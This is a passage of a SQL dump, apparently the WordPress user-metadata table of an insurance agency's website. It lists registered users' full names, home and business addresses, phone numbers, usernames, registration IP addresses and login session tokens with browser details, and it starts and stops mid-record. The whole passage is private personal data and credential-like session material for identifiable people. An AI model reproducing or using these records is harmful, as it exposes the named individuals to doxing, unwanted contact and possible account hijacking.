43'),(2368,79,'addr2',''),(2371,79,'city','brooklyn'),(2374,79,'thestate','ny'),(2377,79,'zip','11204'),(2380,79,'country','usa'),(2383,79,'phone1','9178377289'),(2386,79,'wpmem_reg_ip','71.167.25.192'),(2389,79,'wpmem_reg_url','http://www.empireins.com/register/'),(2391,79,'tos',''),(2394,79,'bgusername','sadolf'),(2397,79,'active','1'),(2398,82,'nickname','liflan1'),(2401,82,'first_name','samuel'),(2404,82,'last_name','landau'),(2407,82,'description',''),(2410,82,'rich_editing','true'),(2413,82,'comment_shortcuts','false'),(2416,82,'admin_color','fresh'),(2419,82,'use_ssl','0'),(2422,82,'show_admin_bar_front','true'),(2425,82,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(2428,82,'wp_user_level','0'),(2431,82,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(2434,82,'addr1','1279-50th street 3rd fl.'),(2437,82,'addr2',''),(2440,82,'city','brooklyn'),(2443,82,'thestate','ny'),(2446,82,'zip','11219'),(2449,82,'country','usa'),(2452,82,'phone1','7188512491'),(2455,82,'wpmem_reg_ip','173.68.231.214'),(2458,82,'wpmem_reg_url','http://www.empireins.com/term-quotes/'),(2460,82,'tos',''),(2463,82,'bgusername','liflan1'),(2466,82,'active','1'),(2467,82,'session_tokens','a:1:{s:64:\"aed3008cc1913d54a931de696f976cb8ef968e97a2e9e42f00dbe80147377de9\";a:4:{s:10:\"expiration\";i:1453318847;s:2:\"ip\";s:14:\"173.68.231.214\";s:2:\"ua\";s:68:\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1453146047;}}'),(2469,84,'nickname','bassul70'),(2472,84,'first_name','Joseph'),(2475,84,'last_name','Bassul'),(2478,84,'description',''),(2481,84,'rich_editing','true'),(2484,84,'comment_shortcuts','false'),(2487,84,'admin_color','fresh'),(2490,84,'use_ssl','0'),(2493,84,'show_admin_bar_front','true'),(2496,84,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(2499,84,'wp_user_level','0'),(2502,84,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(2505,84,'addr1','134 Broadway'),(2508,84,'addr2',''),(2511,84,'city','Brooklyn'),(2514,84,'thestate','ny'),(2517,84,'zip','11249'),(2520,84,'country','usa'),(2523,84,'phone1','718-909-1581'),(2526,84,'wpmem_reg_ip','24.213.178.195'),(2529,84,'wpmem_reg_url','http://www.empireins.com/register/'),(2530,85,'nickname','jojo'),(2533,85,'first_name','joseph'),(2536,85,'last_name','portal'),(2539,85,'description',''),(2542,85,'rich_editing','true'),(2545,85,'comment_shortcuts','false'),(2548,85,'admin_color','fresh'),(2551,85,'use_ssl','0'),(2554,85,'show_admin_bar_front','true'),(2557,85,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(2560,85,'wp_user_level','0'),(2563,85,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(2566,85,'addr1','66 dykstras way east'),(2569,85,'addr2',''),(2572,85,'city','monsey'),(2575,85,'thestate','Ny'),(2578,85,'zip','10952'),(2581,85,'country','usa'),(2584,85,'phone1','8454225976'),(2587,85,'wpmem_reg_ip','108.41.135.17'),(2590,85,'wpmem_reg_url','http://www.empireins.com/agent-tools/'),(2593,84,'tos',''),(2596,84,'bgusername','bassul70'),(2599,84,'active','1'),(2601,84,'session_tokens','a:2:{s:64:\"c8de1f1fb5f0f947f492474a190baeb0baddff62684d93632cd7ef9d9460b57f\";a:4:{s:10:\"expiration\";i:1452889395;s:2:\"ip\";s:14:\"24.213.178.195\";s:2:\"ua\";s:119:\"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.122 Safari/537.36 OPR/24.0.1558.64\";s:5:\"login\";i:1452716595;}s:64:\"199f43ddd49f1788372e5d8b470eba30007b27b6c7380126677a2fdb09e47aff\";a:4:{s:10:\"expiration\";i:1452889411;s:2:\"ip\";s:14:\"24.213.178.195\";s:2:\"ua\";s:119:\"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.122 Safari/537.36 OPR/24.0.1558.64\";s:5:\"login\";i:1452716611;}}'),(2602,88,'nickname','ABRAVER@KENTCO.COM'),(2605,88,'first_name','shlome'),(2608,88,'last_name','braver'),(2611,88,'description',''),(2614,88,'rich_editing','true'),(2617,88,'comment_shortcuts','false'),(2620,88,'admin_color','fresh'),(2623,88,'use_ssl','0'),(2626,88,'show_admin_bar_front','true'),(2629,88,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(2632,88,'wp_user_level','0'),(2635,88,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(2638,88,'addr1','45 south 8 st'),(2641,88,'addr2',''),(2644,88,'city','brooklyn'),(2647,88,'thestate','New York'),(2650,88,'zip','11249'),(2653,88,'country','United States'),(2656,88,'phone1','7183847369'),(2659,88,'wpmem_reg_ip','50.74.240.14'),(2662,88,'wpmem_reg_url','http://www.empireins.com/term-quotes/'),(2664,88,'tos',''),(2667,88,'bgusername','ABRAVER@KENTCO.COM'),(2670,88,'active','1'),(2674,67,'session_tokens','a:1:{s:64:\"6c5a2fc86a69f23e926c90e3c2579957dedadaef4e2ffb3c5f0f8df53ecabaae\";a:4:{s:10:\"expiration\";i:1463246849;s:2:\"ip\";s:14:\"24.213.178.195\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36\";s:5:\"login\";i:1463074049;}}'),(2677,88,'session_tokens','a:1:{s:64:\"12547800902b2d7416e138dd05946e90cd23b403012abb9bdfc671e58bf354ad\";a:4:{s:10:\"expiration\";i:1463171368;s:2:\"ip\";s:12:\"50.74.240.14\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36\";s:5:\"login\";i:1462998568;}}'),(2680,91,'nickname','mittelmanh'),(2683,91,'first_name','Hershel'),(2686,91,'last_name','Mittelman'),(2689,91,'description',''),(2692,91,'rich_editing','true'),(2695,91,'comment_shortcuts','false'),(2698,91,'admin_color','fresh'),(2701,91,'use_ssl','0'),(2704,91,'show_admin_bar_front','true'),(2707,91,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(2710,91,'wp_user_level','0'),(2713,91,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(2716,91,'addr1','796 Wythe Ave #2A'),(2719,91,'addr2',''),(2722,91,'city','Brooklyn'),(2725,91,'thestate','NY'),(2728,91,'zip','11249'),(2731,91,'country','USA'),(2734,91,'phone1','646-637-4145'),(2737,91,'wpmem_reg_ip','66.55.146.149'),(2740,91,'wpmem_reg_url','http://www.empireins.com/term-quotes/'),(2814,37,'bgusername','dbraver'),(2817,91,'tos',''),(2820,91,'bgusername','mittelmanh'),(2823,91,'active','1'),(2824,91,'session_tokens','a:2:{s:64:\"8f7be83b0e56ed3753e8b9b2b0f7218edff0135c33786ba8a24aaebf6f8b8cb7\";a:4:{s:10:\"expiration\";i:1456863990;s:2:\"ip\";s:13:\"209.64.152.62\";s:2:\"ua\";s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36\";s:5:\"login\";i:1456691190;}s:64:\"737c2255ada0347f9a7ddba701fd47200722382ca33c38c00ce44d8aa380b7ac\";a:4:{s:10:\"expiration\";i:1456942013;s:2:\"ip\";s:13:\"209.64.152.62\";s:2:\"ua\";s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36\";s:5:\"login\";i:1456769213;}}'),(2827,97,'nickname','joelgoldberger'),(2830,97,'first_name','Joel'),(2833,97,'last_name','goldberger'),(2836,97,'description',''),(2839,97,'rich_editing','true'),(2842,97,'comment_shortcuts','false'),(2845,97,'admin_color','fresh'),(2848,97,'use_ssl','0'),(2851,97,'show_admin_bar_front','true'),(2854,97,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(2857,97,'wp_user_level','0'),(2860,97,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(2863,97,'addr1','9 juliana place'),(2866,97,'addr2',''),(2869,97,'city','brooklyn'),(2872,97,'thestate','New York'),(2875,97,'zip','11249'),(2878,97,'country','United States'),(2881,97,'phone1','7185998426'),(2884,97,'wpmem_reg_ip','75.99.37.250'),(2887,97,'wpmem_reg_url','http://www.empireins.com/agent-tools/'),(2889,97,'tos',''),(2892,97,'bgusername','joelgoldberger'),(2895,97,'active','1'),(2898,97,'session_tokens','a:1:{s:64:\"2751eb2c8ab93b557dadfa209d20a2cdb1ea5e7343e37fc3dc43e9af4130b51e\";a:4:{s:10:\"expiration\";i:1462646634;s:2:\"ip\";s:12:\"75.99.37.250\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36\";s:5:\"login\";i:1462473834;}}'),(2901,99,'nickname','bengross'),(2904,99,'first_name','ben'),(2907,99,'last_name','Gross'),(2910,99,'description',''),(2913,99,'rich_editing','true'),(2916,99,'comment_shortcuts','false'),(2919,99,'admin_color','fresh'),(2922,99,'use_ssl','0'),(2925,99,'show_admin_bar_front','true'),(2928,99,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(2931,99,'wp_user_level','0'),(2934,99,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(2937,99,'addr1','9 cucolo lane'),(2940,99,'addr2',''),(2943,99,'city','Monsey'),(2946,99,'thestate','New York'),(2949,99,'zip','10952'),(2952,99,'country','usa'),(2955,99,'phone1','9174743026'),(2958,99,'wpmem_reg_ip','108.41.135.17'),(2961,99,'wpmem_reg_url','http://www.empireins.com/agent-tools/'),(2964,99,'tos',''),(2967,99,'bgusername','bengross'),(2970,99,'active','1'),(2974,100,'nickname','enzxw'),(2977,100,'first_name','zev'),(2980,100,'last_name','Walter'),(2983,100,'description',''),(2986,100,'rich_editing','true'),(2989,100,'comment_shortcuts','false'),(2992,100,'admin_color','fresh'),(2995,100,'use_ssl','0'),(2998,100,'show_admin_bar_front','true'),(3001,100,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(3004,100,'wp_user_level','0'),(3007,100,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(3010,100,'addr1','3611 14th Ave'),(3013,100,'addr2',''),(3016,100,'city','brooklyn'),(3019,100,'thestate','ny'),(3022,100,'zip','11204'),(3025,100,'country','usa'),(3028,100,'phone1','7188718880'),(3031,100,'wpmem_reg_ip','104.246.54.244'),(3034,100,'wpmem_reg_url','http://www.empireins.com/register/'),(3037,100,'tos',''),(3040,100,'bgusername','enzxw'),(3043,100,'active','1'),(3045,100,'session_tokens','a:1:{s:64:\"549f2292f3c8d90ffeab6388483a62e89b928de0da78c682d3c057487c6b2e7c\";a:4:{s:10:\"expiration\";i:1453307140;s:2:\"ip\";s:14:\"104.246.54.244\";s:2:\"ua\";s:102:\"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36\";s:5:\"login\";i:1453134340;}}'),(3048,102,'nickname','Biny1280'),(3051,102,'first_name','Binyamin'),(3054,102,'last_name','Glancz'),(3057,102,'description',''),(3060,102,'rich_editing','true'),(3063,102,'comment_shortcuts','false'),(3066,102,'admin_color','fresh'),(3069,102,'use_ssl','0'),(3072,102,'show_admin_bar_front','true'),(3075,102,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(3078,102,'wp_user_level','0'),(3081,102,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(3084,102,'addr1','PO Box 1170'),(3087,102,'addr2',''),(3090,102,'city','Monsey'),(3093,102,'thestate','New York'),(3096,102,'zip','10952'),(3099,102,'country','united states'),(3102,102,'phone1','8453524383'),(3105,102,'wpmem_reg_ip','108.29.7.204'),(3108,102,'wpmem_reg_url','http://www.empireins.com/agent-tools/'),(3111,102,'tos',''),(3114,102,'bgusername','Biny1280'),(3117,102,'active','1'),(3118,102,'session_tokens','a:2:{s:64:\"6b2c10327ae879d8a25bde436b8da885721c2633d4f6db63839dd23a310f5c35\";a:4:{s:10:\"expiration\";i:1463147527;s:2:\"ip\";s:12:\"67.85.210.17\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36\";s:5:\"login\";i:1462974727;}s:64:\"672461f659b69a243a5cb53b2a91a5cbd5f1e4b9ae1b16bf817b2dfd92f80d65\";a:4:{s:10:\"expiration\";i:1463319906;s:2:\"ip\";s:12:\"67.85.210.17\";s:2:\"ua\";s:109:\"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36\";s:5:\"login\";i:1463147106;}}'),(3121,35,'session_tokens','a:1:{s:64:\"a106479f3a0e227dffe968c6cccba27c7ded25a6bdcd5f16f46ac3dd3ef67faf\";a:4:{s:10:\"expiration\";i:1453318640;s:2:\"ip\";s:13:\"69.112.101.64\";s:2:\"ua\";s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36\";s:5:\"login\";i:1453145840;}}'),(3123,105,'nickname','Lmschwartz@bfgny.com'),(3126,105,'first_name','Martin'),(3129,105,'last_name','Schwartz'),(3132,105,'description',''),(3135,105,'rich_editing','true'),(3138,105,'comment_shortcuts','false'),(3141,105,'admin_color','fresh'),(3144,105,'use_ssl','0'),(3147,105,'show_admin_bar_front','true'),(3150,105,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(3153,105,'wp_user_level','0'),(3156,105,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(3159,105,'addr1','1724 48th Street'),(3162,105,'addr2',''),(3165,105,'city','Brooklyn,'),(3168,105,'thestate','NY'),(3171,105,'zip','11204'),(3174,105,'country','USA'),(3177,105,'phone1','(718) 437-5699'),(3180,105,'wpmem_reg_ip','24.46.26.32'),(3183,105,'wpmem_reg_url','http://www.empireins.com/register/'),(3186,105,'tos',''),(3189,105,'bgusername','Lmschwartz@bfgny.com'),(3192,105,'active','1'),(3195,105,'session_tokens','a:2:{s:64:\"68bc2ec305afd976554639112585d2052c7dbb99f769ece8343d3757a813c0d6\";a:4:{s:10:\"expiration\";i:1454524431;s:2:\"ip\";s:11:\"24.46.26.32\";s:2:\"ua\";s:71:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)\";s:5:\"login\";i:1453314831;}s:64:\"a56fbff9accb1e12bb2010b0ba063ad6fac41281e28270deae2a70853c39a268\";a:4:{s:10:\"expiration\";i:1454643410;s:2:\"ip\";s:12:\"67.81.62.104\";s:2:\"ua\";s:75:\"Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko\";s:5:\"login\";i:1453433810;}}'),(3196,106,'nickname','joel32'),(3199,106,'first_name','Yoel'),(3202,106,'last_name','Friedman'),(3205,106,'description',''),(3208,106,'rich_editing','true'),(3211,106,'comment_shortcuts','false'),(3214,106,'admin_color','fresh'),(3217,106,'use_ssl','0'),(3220,106,'show_admin_bar_front','true'),(3223,106,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(3226,106,'wp_user_level','0'),(3229,106,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(3232,106,'addr1','23 Robbert Pit Drive'),(3235,106,'addr2',''),(3238,106,'city','MONSEY'),(3241,106,'thestate','New York'),(3244,106,'zip','10952'),(3247,106,'country','USA'),(3250,106,'phone1','845-662-5411'),(3253,106,'wpmem_reg_ip','108.41.135.17'),(3256,106,'wpmem_reg_url','http://www.empireins.com/register/'),(3258,106,'tos',''),(3261,106,'bgusername','joel32'),(3264,106,'active','1'),(3267,106,'session_tokens','a:1:{s:64:\"7813a765061a51e677b21ad64e9c6372153f7e85396bdfafa89801b0acc9223b\";a:4:{s:10:\"expiration\";i:1463423946;s:2:\"ip\";s:12:\"100.33.27.80\";s:2:\"ua\";s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36\";s:5:\"login\";i:1462214346;}}'),(3268,109,'nickname','kestenbaum'),(3271,109,'first_name','chaim'),(3274,109,'last_name','kestenbaum'),(3277,109,'description',''),(3280,109,'rich_editing','true'),(3283,109,'comment_shortcuts','false'),(3286,109,'admin_color','fresh'),(3289,109,'use_ssl','0'),(3292,109,'show_admin_bar_front','true'),(3295,109,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(3298,109,'wp_user_level','0'),(3301,109,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(3304,109,'addr1','21 walton st'),(3307,109,'addr2',''),(3310,109,'city','brooklyn'),(3313,109,'thestate','ny'),(3316,109,'zip','11206'),(3319,109,'country','kings'),(3322,109,'phone1','718-782-0242'),(3325,109,'wpmem_reg_ip','69.164.138.195'),(3328,109,'wpmem_reg_url','http://www.empireins.com/term-quotes/'),(3330,109,'tos',''),(3333,109,'bgusername','kestenbaum'),(3336,109,'active','1'),(3337,109,'session_tokens','a:1:{s:64:\"309487b931d00b976d6860b8ce43d74204235f243ec6707bfdc5dc851918277c\";a:4:{s:10:\"expiration\";i:1454443196;s:2:\"ip\";s:14:\"69.164.138.195\";s:2:\"ua\";s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\";s:5:\"login\";i:1453233596;}}'),(3340,112,'nickname','hkellner'),(3343,112,'first_name','Henry'),(3346,112,'last_name','Kellner'),(3349,112,'description',''),(3352,112,'rich_editing','true'),(3355,112,'comment_shortcuts','false'),(3358,112,'admin_color','fresh'),(3361,112,'use_ssl','0'),(3364,112,'show_admin_bar_front','true'),(3367,112,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(3370,112,'wp_user_level','0'),(3373,112,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(3376,112,'addr1','382 Route 59 #292'),(3379,112,'addr2',''),(3382,112,'city','Monsey'),(3385,112,'thestate','N. Y.'),(3388,112,'zip','10952'),(3391,112,'country','USA'),(3394,112,'phone1','845 371 6286'),(3397,112,'wpmem_reg_ip','47.23.66.242'),(3400,112,'wpmem_reg_url','http://www.empireins.com/term-quotes/'),(3403,112,'tos',''),(3406,112,'bgusername','hkellner'),(3409,112,'active','1'),(3412,112,'session_tokens','a:1:{s:64:\"53ab4cd222bafb64e3ad4ca8e977f08396bcfcd6c2cf9dca16eca8d0de79af67\";a:4:{s:10:\"expiration\";i:1461357973;s:2:\"ip\";s:12:\"47.23.66.242\";s:2:\"ua\";s:63:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)\";s:5:\"login\";i:1461185173;}}'),(3414,114,'nickname','entxg'),(3417,114,'first_name','tovia'),(3420,114,'last_name','gross'),(3423,114,'description',''),(3426,114,'rich_editing','true'),(3429,114,'comment_shortcuts','false'),(3432,114,'admin_color','fresh'),(3435,114,'use_ssl','0'),(3438,114,'show_admin_bar_front','true'),(3441,114,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(3444,114,'wp_user_level','0'),(3447,114,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(3450,114,'addr1','800 bedford ave 3a#'),(3453,114,'addr2',''),(3456,114,'city','brooklyn'),(3459,114,'thestate','ny'),(3462,114,'zip','11205'),(3465,114,'country','USA'),(3468,114,'phone1','3472686549'),(3471,114,'wpmem_reg_ip','104.246.54.244'),(3474,114,'wpmem_reg_url','http://www.empireins.com/agent-tools/'),(3475,114,'tos',''),(3478,114,'bgusername','entxg'),(3481,114,'active','1'),(3483,114,'session_tokens','a:1:{s:64:\"6f6a5048cf0f62079571511e2daedfcae26db75276c77b284bf9c7fea0fde56f\";a:4:{s:10:\"expiration\";i:1453489350;s:2:\"ip\";s:14:\"104.246.54.244\";s:2:\"ua\";s:68:\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1453316550;}}'),(3486,117,'nickname','madler'),(3489,117,'first_name','Mordechai'),(3492,117,'last_name','Adler'),(3495,117,'description',''),(3498,117,'rich_editing','true'),(3501,117,'comment_shortcuts','false'),(3504,117,'admin_color','fresh'),(3507,117,'use_ssl','0'),(3510,117,'show_admin_bar_front','true'),(3513,117,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(3516,117,'wp_user_level','0'),(3519,117,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(3522,117,'addr1','266 Broadway #504'),(3525,117,'addr2',''),(3528,117,'city','Brooklyn'),(3531,117,'thestate','NY'),(3534,117,'zip','11211'),(3537,117,'country','usa'),(3540,117,'phone1','7183608040'),(3543,117,'wpmem_reg_ip','74.65.218.246'),(3546,117,'wpmem_reg_url','http://www.empireins.com/term-quotes/'),(3547,117,'tos',''),(3550,117,'bgusername','madler'),(3553,117,'active','1'),(3556,117,'session_tokens','a:2:{s:64:\"a5d4968fc4d7a0e758f486be6a227d90f1d28bb36be948e6e288ec6099b48556\";a:4:{s:10:\"expiration\";i:1463086490;s:2:\"ip\";s:13:\"74.65.218.246\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36\";s:5:\"login\";i:1462913690;}s:64:\"fcf6f237e004e44394c88c6ae2fc50ce6867eacef431b7e110874563ee144f7c\";a:4:{s:10:\"expiration\";i:1463086669;s:2:\"ip\";s:13:\"74.65.218.246\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36\";s:5:\"login\";i:1462913869;}}'),(3561,120,'nickname','SimkowitzCo'),(3564,120,'first_name','David'),(3567,120,'last_name','Simkowitz'),(3570,120,'description',''),(3573,120,'rich_editing','true'),(3576,120,'comment_shortcuts','false'),(3579,120,'admin_color','fresh'),(3582,120,'use_ssl','0'),(3585,120,'show_admin_bar_front','true'),(3588,120,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(3591,120,'wp_user_level','0'),(3594,120,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(3597,120,'addr1','268 Willoughby Ave'),(3600,120,'addr2',''),(3603,120,'city','Brooklyn'),(3606,120,'thestate','NY'),(3609,120,'zip','11205'),(3612,120,'country','Kings'),(3615,120,'phone1','718-218-7000'),(3618,120,'bgusername','Simkowitz&co'),(3621,120,'tos',''),(3624,120,'active','1'),(3625,120,'session_tokens','a:3:{s:64:\"1f445c00ff3ef2477eed90ad7a84ebd50b66f330f7786535dd5f7ffdb43cb6b2\";a:4:{s:10:\"expiration\";i:1463239959;s:2:\"ip\";s:12:\"75.99.37.250\";s:2:\"ua\";s:68:\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1463067159;}s:64:\"b2c65c3748947b9e1dfe6c749b9149b828bd2d96ee4acf309e314edcf668b381\";a:4:{s:10:\"expiration\";i:1463321051;s:2:\"ip\";s:12:\"75.99.37.250\";s:2:\"ua\";s:68:\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1463148251;}s:64:\"30e0e72bc9d75b60520a7718e71a9f3d930365a5ae01a5c4634fccdc8d3b460e\";a:4:{s:10:\"expiration\";i:1463330851;s:2:\"ip\";s:12:\"75.99.37.250\";s:2:\"ua\";s:71:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)\";s:5:\"login\";i:1463158051;}}'),(3627,123,'nickname','aefriend'),(3630,123,'first_name','Samuel'),(3633,123,'last_name','Weber'),(3636,123,'description',''),(3639,123,'rich_editing','true'),(3642,123,'comment_shortcuts','false'),(3645,123,'admin_color','fresh'),(3648,123,'use_ssl','0'),(3651,123,'show_admin_bar_front','true'),(3654,123,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(3657,123,'wp_user_level','0'),(3660,123,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(3663,123,'addr1','5415 15th Ave.'),(3666,123,'addr2',''),(3669,123,'city','Brooklyn'),(3672,123,'thestate','NY'),(3675,123,'zip','11219'),(3678,123,'country','USA'),(3681,123,'phone1','718-972-3940'),(3684,123,'wpmem_reg_ip','47.23.0.138'),(3687,123,'wpmem_reg_url','http://www.empireins.com/register/'),(3690,123,'tos',''),(3693,123,'bgusername','aefriend'),(3696,123,'active','1'),(3699,123,'session_tokens','a:2:{s:64:\"88398f55fc92b9039c73702fcfc740a568b9f2531a32e604c47747211490d184\";a:4:{s:10:\"expiration\";i:1453573462;s:2:\"ip\";s:11:\"47.23.0.138\";s:2:\"ua\";s:68:\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1453400662;}s:64:\"904745ae880d92a131af90333064638f8af761bef24cdf6656ffc4da1880eea8\";a:4:{s:10:\"expiration\";i:1453573478;s:2:\"ip\";s:11:\"47.23.0.138\";s:2:\"ua\";s:68:\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1453400678;}}'),(3702,126,'nickname','hermankatz'),(3705,126,'first_name','herman'),(3708,126,'last_name','katz'),(3711,126,'description',''),(3714,126,'rich_editing','true'),(3717,126,'comment_shortcuts','false'),(3720,126,'admin_color','fresh'),(3723,126,'use_ssl','0'),(3726,126,'show_admin_bar_front','true'),(3729,126,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(3732,126,'wp_user_level','0'),(3735,126,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(3738,126,'addr1','1279 50th st'),(3741,126,'addr2',''),(3744,126,'city','brooklyn'),(3747,126,'thestate','ny'),(3750,126,'zip','11219'),(3753,126,'country','usa'),(3756,126,'phone1','718-437-7166'),(3759,126,'wpmem_reg_ip','206.210.27.33'),(3762,126,'wpmem_reg_url','http://www.empireins.com/register/'),(3765,129,'nickname','Chaya'),(3768,129,'first_name','Chaya'),(3771,129,'last_name','Klein'),(3774,129,'description',''),(3777,129,'rich_editing','true'),(3780,129,'comment_shortcuts','false'),(3783,129,'admin_color','fresh'),(3786,129,'use_ssl','0'),(3789,129,'show_admin_bar_front','true'),(3792,129,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(3795,129,'wp_user_level','0'),(3798,129,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(3801,129,'addr1','38 Skillman St.'),(3804,129,'addr2',''),(3807,129,'city','Brooklyn'),(3810,129,'thestate','NY'),(3813,129,'zip','11205'),(3816,129,'country','US'),(3819,129,'phone1','7182189647'),(3822,129,'wpmem_reg_ip','108.58.88.178'),(3825,129,'wpmem_reg_url','http://www.empireins.com/register/'),(3828,126,'tos',''),(3831,126,'bgusername','hermankatz'),(3834,126,'active','1'),(3835,129,'tos',''),(3838,129,'bgusername','Chaya'),(3841,129,'active','1'),(3844,126,'session_tokens','a:2:{s:64:\"5754276d10c13bc9ec31073611e7d70c3edd6f965b38fb67a5d095e8b17c37b1\";a:4:{s:10:\"expiration\";i:1463159944;s:2:\"ip\";s:13:\"70.214.105.43\";s:2:\"ua\";s:126:\"Mozilla/5.0 (iPad; CPU OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1\";s:5:\"login\";i:1462987144;}s:64:\"2a5e6fbe8999cd5b778f1b5232d7f34096fc864bf6fb70e4100151a4eae98fea\";a:4:{s:10:\"expiration\";i:1463176436;s:2:\"ip\";s:13:\"206.210.17.33\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36\";s:5:\"login\";i:1463003636;}}'),(3850,130,'nickname','Jschwinder'),(3853,130,'first_name','Joseph'),(3856,130,'last_name','Schwinder'),(3859,130,'description',''),(3862,130,'rich_editing','true'),(3865,130,'comment_shortcuts','false'),(3868,130,'admin_color','fresh'),(3871,130,'use_ssl','0'),(3874,130,'show_admin_bar_front','true'),(3877,130,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(3880,130,'wp_user_level','0'),(3883,130,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(3886,130,'addr1','1541 